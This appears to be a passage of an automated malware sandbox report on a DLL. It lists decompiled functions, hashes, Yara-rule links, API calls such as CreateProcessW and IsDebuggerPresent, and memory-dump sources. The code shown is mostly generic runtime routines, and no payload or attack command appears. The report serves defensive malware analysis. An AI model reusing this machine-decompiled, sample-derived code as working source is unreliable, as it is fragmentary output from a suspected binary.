Instruction ID: 29a5052ed613cd8666c2a0b15a52358528e9451699c4a0681b84363b2f2468a8
Opcode Fuzzy Hash: 1178260e8bffcb175f16ce8929f72affff1d2575aebcf493ec367cb625912061
Instruction Fuzzy Hash: 1DE08C10F0960382FF186FF2B8680391198DF9FB00F40D034C90D43392EE2CB86D8604

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800284B0 Relevance: 1.6, APIs: 1, Instructions: 121processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE ref: 000000018002867E

Memory Dump Source

Source File: 00000000.00000002.322582436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 16f61cbd6d489d93c3999831aad5c05b50de217028ac9f2dcc58791474f8e422
Instruction ID: b9dfd44ec2654d149dbfc67a3d285e1c446cc2681133f70a5a1c8efdf6c35088
Opcode Fuzzy Hash: 16f61cbd6d489d93c3999831aad5c05b50de217028ac9f2dcc58791474f8e422
Instruction Fuzzy Hash: 59415D7090C7848FE7B8DF18D48979ABBE0FB88315F108A1EE48DC7291DB349448CB46

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA094F22B0 Relevance: 1.6, APIs: 1, Instructions: 57
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 50%

			E00007FFA7FFA094F22B0(long long __rax, long long __rcx, long long __rdx, long long _a8, long long _a16, signed char _a24) {
				long long _v16;
				signed char _v24;
				intOrPtr* _t48;
				intOrPtr* _t50;

				_t48 = __rax;
				_a24 = r8b;
				_a16 = __rdx;
				_a8 = __rcx;
				E00007FFA7FFA094F2830(__rax, _a8);
				if (_t48 - _a16 >= 0) goto 0x94f22de;
				E00007FFA7FFA094F2230(_a8);
				E00007FFA7FFA094F2150(_t48, _a8);
				if ( *_t48 - _a16 >= 0) goto 0x94f2310;
				E00007FFA7FFA094F2170(_t48, _a8);
				E00007FFA7FFA094F2600(_a8, _a16,  *_t48); // executed
				goto 0x94f237a;
				if ((_a24 & 0x000000ff) == 0) goto 0x94f2366;
				if (_a16 - 0x10 >= 0) goto 0x94f2366;
				E00007FFA7FFA094F2170(_t48, _a8);
				if (_a16 -  *_t48 >= 0) goto 0x94f2341;
				_t50 = _a16;
				_v16 = _t50;
				goto 0x94f2353;
				E00007FFA7FFA094F2170(_t50, _a8);
				_v16 =  *_t50;
				E00007FFA7FFA094F1910(1,  *_t50, _a8, _v16);
				goto 0x94f237a;
				if (_a16 != 0) goto 0x94f237a;
				E00007FFA7FFA094F23A0( *_t50, _a8, _a16);
				if (_a16 <= 0) goto 0x94f238c;
				_v24 = 1;
				goto 0x94f2394;
				_v24 = 0;
				return _v24 & 0x000000ff;
			}

0x7ffa094f22b0
0x7ffa094f22b0
0x7ffa094f22b5
0x7ffa094f22ba
0x7ffa094f22c8
0x7ffa094f22d2
0x7ffa094f22d9
0x7ffa094f22e3
0x7ffa094f22f0
0x7ffa094f22f7
0x7ffa094f2309
0x7ffa094f230e
0x7ffa094f2317
0x7ffa094f231f
0x7ffa094f2326
0x7ffa094f2333
0x7ffa094f2335
0x7ffa094f233a
0x7ffa094f233f
0x7ffa094f2346
0x7ffa094f234e
0x7ffa094f235f
0x7ffa094f2364
0x7ffa094f236c
0x7ffa094f2375
0x7ffa094f2380
0x7ffa094f2382
0x7ffa094f238a
0x7ffa094f238c
0x7ffa094f239d

APIs

Part of subcall function 00007FFA094F2830: Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFA094F283E
Part of subcall function 00007FFA094F2830: Concurrency::details::SchedulerBase::ThrottlerDispatchBridge.LIBCMTD ref: 00007FFA094F284B

_Mtx_guard::~_Mtx_guard.LIBCPMTD ref: 00007FFA094F22D9

Part of subcall function 00007FFA094F2170: Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFA094F217E

Memory Dump Source

Source File: 00000000.00000002.324192093.00007FFA094F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFA094F0000, based on PE: true

Associated: 00000000.00000002.324171231.00007FFA094F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324350483.00007FFA09528000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324603423.00007FFA0956E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324624454.00007FFA09572000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324638140.00007FFA09575000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324654744.00007FFA09577000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffa094f0000_loaddll64.jbxd

Similarity

API ID: Concurrency::details::$EmptyQueue::StructuredWork$Base::BridgeDispatchMtx_guardMtx_guard::~_SchedulerThrottler
String ID:
API String ID: 1903167320-0
Opcode ID: 8412a15bbd2f4d89551e98d62f984fcb6a76ab0910fb464f93224fef732d8c49
Instruction ID: 3eda08541378eb08580e619e138bb9af3b04931b8d256b2577e0c7e686a48f09
Opcode Fuzzy Hash: 8412a15bbd2f4d89551e98d62f984fcb6a76ab0910fb464f93224fef732d8c49
Instruction Fuzzy Hash: 1F21DD6290CA4381EA109F35F46036E6770FBCA794F608431E79D477A9CEBED964CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA094FAAD0 Relevance: 1.5, APIs: 1, Instructions: 36
memoryCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 37%

			E00007FFA7FFA094FAAD0(void* __eax, signed int __rcx, signed int __rdx) {
				intOrPtr* _t22;
				signed int _t29;

				_t29 = __rdx;
				if (__rcx == 0) goto 0x94faaef;
				_t1 = _t29 - 0x20; // -32
				_t22 = _t1;
				if (_t22 - __rdx < 0) goto 0x94fab32;
				_t25 =  ==  ? _t22 : __rcx * __rdx;
				goto 0x94fab16;
				if (E00007FFA7FFA094FE958() == 0) goto 0x94fab32;
				if (E00007FFA7FFA094F97EC(_t22,  ==  ? _t22 : __rcx * __rdx) == 0) goto 0x94fab32;
				RtlAllocateHeap(??, ??, ??); // executed
				if (_t22 == 0) goto 0x94fab01;
				goto 0x94fab3f;
				E00007FFA7FFA094FB420(_t22);
				 *_t22 = 0xc;
				return 0;
			}

0x7ffa094faad0
0x7ffa094faadf
0x7ffa094faae3
0x7ffa094faae3
0x7ffa094faaed
0x7ffa094faafb
0x7ffa094faaff
0x7ffa094fab08
0x7ffa094fab14
0x7ffa094fab25
0x7ffa094fab2e
0x7ffa094fab30
0x7ffa094fab32
0x7ffa094fab37
0x7ffa094fab44

APIs

RtlAllocateHeap.NTDLL(?,?,00000000,00007FFA094FBAAE,?,?,?,00007FFA094FB429,?,?,?,?,00007FFA09500426,?,?,00000000), ref: 00007FFA094FAB25

Memory Dump Source

Source File: 00000000.00000002.324192093.00007FFA094F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFA094F0000, based on PE: true

Associated: 00000000.00000002.324171231.00007FFA094F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324350483.00007FFA09528000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324603423.00007FFA0956E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324624454.00007FFA09572000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324638140.00007FFA09575000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324654744.00007FFA09577000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffa094f0000_loaddll64.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 280286a628102559a8464dffd4b609b20cb420f0fe1f18d1be992a8bc7a4b5f6
Instruction ID: 8e656ab33577bda0e038e1e59a60e2edfccffe44ccba7957ee20e4d7d42a3ad3
Opcode Fuzzy Hash: 280286a628102559a8464dffd4b609b20cb420f0fe1f18d1be992a8bc7a4b5f6
Instruction Fuzzy Hash: 93F01D44B0A30781FE545F72B5613B552869F5FB44F4CD430CA0E863D1FD2EE8A5C220

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA094FAA18 Relevance: 1.5, APIs: 1, Instructions: 29
memoryCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 37%

			E00007FFA7FFA094FAA18(intOrPtr* __rax, void* __rcx) {

				if (__rcx - 0xffffffe0 > 0) goto 0x94faa63;
				_t16 =  ==  ? __rax : __rcx;
				goto 0x94faa4a;
				if (E00007FFA7FFA094FE958() == 0) goto 0x94faa63;
				if (E00007FFA7FFA094F97EC(__rax,  ==  ? __rax : __rcx) == 0) goto 0x94faa63;
				RtlAllocateHeap(??, ??, ??); // executed
				if (__rax == 0) goto 0x94faa35;
				goto 0x94faa70;
				E00007FFA7FFA094FB420(__rax);
				 *__rax = 0xc;
				return 0;
			}

0x7ffa094faa25
0x7ffa094faa2f
0x7ffa094faa33
0x7ffa094faa3c
0x7ffa094faa48
0x7ffa094faa56
0x7ffa094faa5f
0x7ffa094faa61
0x7ffa094faa63
0x7ffa094faa68
0x7ffa094faa75

APIs

RtlAllocateHeap.NTDLL(?,?,?,00007FFA0950040D,?,?,00000000,00007FFA094FD8B7,?,?,?,00007FFA094FA427,?,?,?,00007FFA094FA31D), ref: 00007FFA094FAA56

Memory Dump Source

Source File: 00000000.00000002.324192093.00007FFA094F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFA094F0000, based on PE: true

Associated: 00000000.00000002.324171231.00007FFA094F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324350483.00007FFA09528000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324603423.00007FFA0956E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324624454.00007FFA09572000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324638140.00007FFA09575000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324654744.00007FFA09577000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffa094f0000_loaddll64.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 4885db743ff87431de90f68300da65782b6b7874996cc61f6450c8fa48a4abb9
Instruction ID: 8477bf89d3e262464e09915c53d3c7349ca3aac162532ee85f722edf5e01c2b2
Opcode Fuzzy Hash: 4885db743ff87431de90f68300da65782b6b7874996cc61f6450c8fa48a4abb9
Instruction Fuzzy Hash: 1DF0F811E1D60745FA646FB2BA6167611849F4FBA0F0C8730DD2E863D1EE6EA469C620

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA094F1540 Relevance: 1.5, APIs: 1, Instructions: 13
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E00007FFA7FFA094F1540(long long __rcx, long long _a8) {
				long long _v24;
				intOrPtr* _t9;
				long long _t13;

				_a8 = __rcx;
				_v24 = 0xfffffffe;
				r8d = 0;
				E00007FFA7FFA094F1910(1, _t9, _a8, _t13); // executed
				return E00007FFA7FFA094F17A0(_a8);
			}

0x7ffa094f1540
0x7ffa094f1549
0x7ffa094f1552
0x7ffa094f155c
0x7ffa094f1571

APIs

Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFA094F1567

Part of subcall function 00007FFA094F17A0: Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFA094F17B1

Memory Dump Source

Source File: 00000000.00000002.324192093.00007FFA094F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFA094F0000, based on PE: true

Associated: 00000000.00000002.324171231.00007FFA094F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324350483.00007FFA09528000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324603423.00007FFA0956E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324624454.00007FFA09572000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324638140.00007FFA09575000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324654744.00007FFA09577000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffa094f0000_loaddll64.jbxd

Similarity

API ID: Concurrency::details::EmptyQueue::StructuredWork
String ID:
API String ID: 1865873047-0
Opcode ID: 1bd39886feb57d30d74c3629fbbe9167a18a0f50d6d703a3308aa091c38b80aa
Instruction ID: 2646d6085f6752533b1d278edca1bea5037fcea8804e5720a3c221fe6d2507d9
Opcode Fuzzy Hash: 1bd39886feb57d30d74c3629fbbe9167a18a0f50d6d703a3308aa091c38b80aa
Instruction Fuzzy Hash: CFD05E2292858281C610AB30E85241E6320F7C73B0FA09720EABC03AE5CE2BD511CB00

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA094F1B10 Relevance: 1.5, APIs: 1, Instructions: 11
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E00007FFA7FFA094F1B10(void* __rax, long long __rcx, long long __rdx, long long _a8, long long _a16) {
				void* _t7;
				void* _t8;

				_t8 = __rax;
				_a16 = __rdx;
				_a8 = __rcx;
				E00007FFA7FFA094F11A0(_a16);
				_t7 = E00007FFA7FFA094F1B40(_t8, _a8, _a16, _t8); // executed
				return _t7;
			}

0x7ffa094f1b10
0x7ffa094f1b10
0x7ffa094f1b15
0x7ffa094f1b23
0x7ffa094f1b35
0x7ffa094f1b3e

APIs

char_traits.LIBCPMTD ref: 00007FFA094F1B23

Part of subcall function 00007FFA094F1B40: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFA094F1B6E

Memory Dump Source

Source File: 00000000.00000002.324192093.00007FFA094F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFA094F0000, based on PE: true

Associated: 00000000.00000002.324171231.00007FFA094F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324350483.00007FFA09528000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324603423.00007FFA0956E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324624454.00007FFA09572000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324638140.00007FFA09575000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324654744.00007FFA09577000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffa094f0000_loaddll64.jbxd

Similarity

API ID: Base::Concurrency::details::ContextIdentityQueueWorkchar_traits
String ID:
API String ID: 1444011685-0
Opcode ID: f789d12e206d7980509269e3e814af15646fd7b4fc038a1338794e0a1668acec
Instruction ID: ed0666e2c7f693742cefc13ce91d634f4be802b0ddba663bb24a9e298cfd217b
Opcode Fuzzy Hash: f789d12e206d7980509269e3e814af15646fd7b4fc038a1338794e0a1668acec
Instruction Fuzzy Hash: 88D09E6692DA82C1D544EF22F89105AA760EBCD7C0F409435FA8E42B2ADE29C1618B00

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00007FFA09503CB0 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 97registrywindowCOMMON

Download Yara Rule

APIs

CreateWindowExW.USER32 ref: 00007FFA09503D39
RegisterTouchWindow.USER32 ref: 00007FFA09503D5A
MessageBoxW.USER32 ref: 00007FFA09503D7A

Strings

Cannot register application window for multi-touch input, xrefs: 00007FFA09503D6E
Error, xrefs: 00007FFA09503D67

Memory Dump Source

Source File: 00000000.00000002.324192093.00007FFA094F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFA094F0000, based on PE: true

Associated: 00000000.00000002.324171231.00007FFA094F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324350483.00007FFA09528000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324603423.00007FFA0956E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324624454.00007FFA09572000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324638140.00007FFA09575000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324654744.00007FFA09577000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffa094f0000_loaddll64.jbxd

Similarity

API ID: Window$CreateMessageRegisterTouch
String ID: Cannot register application window for multi-touch input$Error
API String ID: 490141109-480840240
Opcode ID: 84ab5ff6cfcc38e4e1d3a2e7420c273c9b72630a33a8e8b258941c1555e1b344
Instruction ID: 1cbf5199653ae7085dee4f32ff1ad49fbe849d40510661cb9c056fb18cc1c7e5
Opcode Fuzzy Hash: 84ab5ff6cfcc38e4e1d3a2e7420c273c9b72630a33a8e8b258941c1555e1b344
Instruction Fuzzy Hash: 0C51B235A08B4682E7509F36F89436AB7A8FB8A794F508535DA8E477A4DF3CF148C740

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180003BE8 Relevance: 10.9, Strings: 8, Instructions: 895COMMON

Download Yara Rule

Strings

KI@l, xrefs: 00000001800040D8
@, xrefs: 0000000180003F3F
^e?u, xrefs: 0000000180003EAF
]I, xrefs: 0000000180003E1A
~JO, xrefs: 0000000180003CC5
%wk, xrefs: 0000000180004571
K, xrefs: 00000001800043B5
Hp, xrefs: 00000001800040E6

Memory Dump Source

Source File: 00000000.00000002.322582436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: %wk$@$Hp$KI@l$]I$^e?u$~JO$K
API String ID: 0-1942796489
Opcode ID: 0db96a3033a52dec7f41ba08dcaea74adbed8d76393b2956a65234561adab349
Instruction ID: e1c3b1e3eb44e9ced759bc87f3cac7b1a040f97d798b52c0718f9fedf429efa7
Opcode Fuzzy Hash: 0db96a3033a52dec7f41ba08dcaea74adbed8d76393b2956a65234561adab349
Instruction Fuzzy Hash: 71A2F871504B8C8FEB59CF28C88A59E7BE2FB84744F20461DF96A872A0D774D945CF82

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA094F9474 Relevance: 9.1, APIs: 6, Instructions: 83
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 65%

			E00007FFA7FFA094F9474(void* __ecx, intOrPtr __edx, void* __esp, long long __rbx, void* __rdx, long long __rsi, void* __r8) {
				void* __rdi;
				void* _t36;
				int _t40;
				void* _t45;
				intOrPtr _t53;
				signed long long _t63;
				long long _t66;
				_Unknown_base(*)()* _t86;
				void* _t90;
				void* _t91;
				void* _t93;
				signed long long _t94;
				struct _EXCEPTION_POINTERS* _t100;

				_t46 = __ecx;
				 *((long long*)(_t93 + 0x10)) = __rbx;
				 *((long long*)(_t93 + 0x18)) = __rsi;
				_t91 = _t93 - 0x4f0;
				_t94 = _t93 - 0x5f0;
				_t63 =  *0x956e008; // 0x53c008c84601
				 *(_t91 + 0x4e0) = _t63 ^ _t94;
				_t53 = r8d;
				_t45 = __ecx;
				if (__ecx == 0xffffffff) goto 0x94f94b3;
				E00007FFA7FFA094F493C(_t36);
				r8d = 0x98;
				E00007FFA7FFA094F6920(__ecx, 0, _t53, __esp, _t94 + 0x70, __rdx, _t86, __r8);
				r8d = 0x4d0;
				E00007FFA7FFA094F6920(_t46, 0, _t53, __esp, _t91 + 0x10, __rdx, _t86, __r8);
				 *((long long*)(_t94 + 0x48)) = _t94 + 0x70;
				_t66 = _t91 + 0x10;
				 *((long long*)(_t94 + 0x50)) = _t66;
				__imp__RtlCaptureContext();
				r8d = 0;
				__imp__RtlLookupFunctionEntry();
				if (_t66 == 0) goto 0x94f9546;
				 *(_t94 + 0x38) =  *(_t94 + 0x38) & 0x00000000;
				 *((long long*)(_t94 + 0x30)) = _t94 + 0x58;
				 *((long long*)(_t94 + 0x28)) = _t94 + 0x60;
				 *((long long*)(_t94 + 0x20)) = _t91 + 0x10;
				__imp__RtlVirtualUnwind();
				 *((long long*)(_t91 + 0x108)) =  *((intOrPtr*)(_t91 + 0x508));
				 *((intOrPtr*)(_t94 + 0x70)) = __edx;
				 *((long long*)(_t91 + 0xa8)) = _t91 + 0x510;
				 *((long long*)(_t91 - 0x80)) =  *((intOrPtr*)(_t91 + 0x508));
				 *((intOrPtr*)(_t94 + 0x74)) = _t53;
				_t40 = IsDebuggerPresent();
				SetUnhandledExceptionFilter(_t86, _t90);
				if (UnhandledExceptionFilter(_t100) != 0) goto 0x94f95a8;
				if (_t40 != 0) goto 0x94f95a8;
				if (_t45 == 0xffffffff) goto 0x94f95a8;
				return E00007FFA7FFA094F3A70(E00007FFA7FFA094F493C(_t42), _t45, 0,  *(_t91 + 0x4e0) ^ _t94);
			}

0x7ffa094f9474
0x7ffa094f9474
0x7ffa094f9479
0x7ffa094f9482
0x7ffa094f948a
0x7ffa094f9491
0x7ffa094f949b
0x7ffa094f94a2
0x7ffa094f94a7
0x7ffa094f94ac
0x7ffa094f94ae
0x7ffa094f94ba
0x7ffa094f94c0
0x7ffa094f94cb
0x7ffa094f94d1
0x7ffa094f94db
0x7ffa094f94e4
0x7ffa094f94e8
0x7ffa094f94ed
0x7ffa094f9502
0x7ffa094f9505
0x7ffa094f950e
0x7ffa094f9510
0x7ffa094f9523
0x7ffa094f9530
0x7ffa094f9539
0x7ffa094f9540
0x7ffa094f954d
0x7ffa094f955f
0x7ffa094f9563
0x7ffa094f9571
0x7ffa094f9575
0x7ffa094f9579
0x7ffa094f9583
0x7ffa094f9596
0x7ffa094f959a
0x7ffa094f959f
0x7ffa094f95ce

APIs

RtlCaptureContext.KERNEL32 ref: 00007FFA094F94ED
RtlLookupFunctionEntry.KERNEL32 ref: 00007FFA094F9505
RtlVirtualUnwind.KERNEL32 ref: 00007FFA094F9540
IsDebuggerPresent.KERNEL32 ref: 00007FFA094F9579
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FFA094F9583
UnhandledExceptionFilter.KERNEL32 ref: 00007FFA094F958E

Memory Dump Source

Source File: 00000000.00000002.324192093.00007FFA094F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFA094F0000, based on PE: true

Associated: 00000000.00000002.324171231.00007FFA094F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324350483.00007FFA09528000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324603423.00007FFA0956E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324624454.00007FFA09572000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324638140.00007FFA09575000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324654744.00007FFA09577000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffa094f0000_loaddll64.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: d9a81825362c2da034dc73a6dcc45eb26ccc4f6f61a283cd1a377bdfab111a7c
Instruction ID: 5e0d49c2189e7d89a5ce06d75ab4525dcfa1dc262e2b49a36018c5b2778ba57d
Opcode Fuzzy Hash: d9a81825362c2da034dc73a6dcc45eb26ccc4f6f61a283cd1a377bdfab111a7c
Instruction Fuzzy Hash: 7D315E36608B8286DB648F75F8507AE73A4FB8A754F504135EA8D43B98EF39D159CB00

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180021A2C Relevance: 7.0, Strings: 5, Instructions: 775COMMON

Download Yara Rule

Strings

Aw, xrefs: 00000001800223B5
J, xrefs: 0000000180022998
F, xrefs: 0000000180022101
??, xrefs: 0000000180021F2D
>#3, xrefs: 00000001800226F2

Memory Dump Source

Source File: 00000000.00000002.322582436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: >#3$??$Aw$F$J
API String ID: 0-2784440385
Opcode ID: 9b37fcd8b9b3a2236a01d1c259a381c152bbfd2ce75b9ee2bc70d5e09618c5cf
Instruction ID: 9fdd82093245732d6ff01b86e1d36ab714c40b68dc6afb612ae034bafb5e4a55
Opcode Fuzzy Hash: 9b37fcd8b9b3a2236a01d1c259a381c152bbfd2ce75b9ee2bc70d5e09618c5cf
Instruction Fuzzy Hash: C9924F7054838B8FDB78CF24C845BEE7BE1FB84304F10452DE8698A761E7749A49DB82

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180014C48 Relevance: 6.5, Strings: 5, Instructions: 236COMMON

Download Yara Rule

Strings

fzT, xrefs: 0000000180014CEF
f_, xrefs: 0000000180014F12
, xrefs: 0000000180014E7F, 0000000180014EDA
, xrefs: 0000000180014D11, 0000000180014CE7, 0000000180014DEE
"4, xrefs: 0000000180014F27

Memory Dump Source

Source File: 00000000.00000002.322582436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: "4$f_$fzT$$
API String ID: 0-2251851231
Opcode ID: 22d9a0b68b50d0ea5fd6d1aeab0a3e2fc9a27e070a6cf0ea182e7b607f92900b
Instruction ID: 00078a186b7d7b6ae4f12e3c11a5bc13b18b9b2cdced29765063d95cb29d2c11
Opcode Fuzzy Hash: 22d9a0b68b50d0ea5fd6d1aeab0a3e2fc9a27e070a6cf0ea182e7b607f92900b
Instruction Fuzzy Hash: 42B123B090470A8FDB48DFA8C48A5EEBBF0FB48358F15461DE806A7290D774AA45CFC5

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800173F8 Relevance: 5.4, Strings: 4, Instructions: 380COMMON

Download Yara Rule

Strings

BB, xrefs: 000000018001788F
., xrefs: 0000000180017964
z<, xrefs: 00000001800176EB
4, xrefs: 00000001800179BA

Memory Dump Source

Source File: 00000000.00000002.322582436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: BB$z<$.$4
API String ID: 0-1591233792
Opcode ID: aa7d0a4ee19aefbaa19c8d8e8495d0b927018643d7d53871069b311c10225edc
Instruction ID: f44964999cc3d50e9f587f9f9c8efa5a6e46c46b2493dcde8a40a3edfa6d90f8
Opcode Fuzzy Hash: aa7d0a4ee19aefbaa19c8d8e8495d0b927018643d7d53871069b311c10225edc
Instruction Fuzzy Hash: 3302047190474DCBDF6CDF68C88A6EE7BB0FF48344F00421DEA46A6290D77A9949CB84

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180002128 Relevance: 5.3, Strings: 4, Instructions: 256COMMON

Download Yara Rule

Strings

Jx, xrefs: 00000001800022B1
M[, xrefs: 00000001800023F9
xy, xrefs: 0000000180002465
jP, xrefs: 000000018000214C

Memory Dump Source

Source File: 00000000.00000002.322582436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: Jx$M[$jP$xy
API String ID: 0-882801676
Opcode ID: a27b4655e249ce8e00af1ad73db02211fa2bbf7353868e6a6b849cd1b884cbbc
Instruction ID: 58f3606e86ff435d226b8bd8aedcb6a7b303468577bfe9f696ea944d9a70988a
Opcode Fuzzy Hash: a27b4655e249ce8e00af1ad73db02211fa2bbf7353868e6a6b849cd1b884cbbc
Instruction Fuzzy Hash: DBC1087090475CCBDF59DF68D8896DDBBB0FB48308F118219F89AAB2A1CB789905CF45

Uniqueness

Uniqueness Score: -1.00%

Function 000000018001827C Relevance: 5.2, Strings: 4, Instructions: 178COMMON

Download Yara Rule

Strings

^, xrefs: 00000001800183F5
@2, xrefs: 0000000180018500
&, xrefs: 00000001800184B7
Jn, xrefs: 0000000180018469

Memory Dump Source

Source File: 00000000.00000002.322582436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: &$@2$Jn$^
API String ID: 0-1816242221
Opcode ID: 569fa3d4bf83859d4808d779e504945ae089fbdc48947470bf052a87739f6000
Instruction ID: b42d7ccd07b59f248f07516313cf01464c8448466868081e17338bda4afdc4d1
Opcode Fuzzy Hash: 569fa3d4bf83859d4808d779e504945ae089fbdc48947470bf052a87739f6000
Instruction Fuzzy Hash: 95910470D0471A8BEF98DFA8D48A6EEBBF0FB48344F108119E515B6290D7789A48CF95

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180028A04 Relevance: 5.1, Strings: 4, Instructions: 92COMMON

Download Yara Rule

Strings

36H, xrefs: 0000000180028AE0
Yfr4, xrefs: 0000000180028A22
;, xrefs: 0000000180028B42
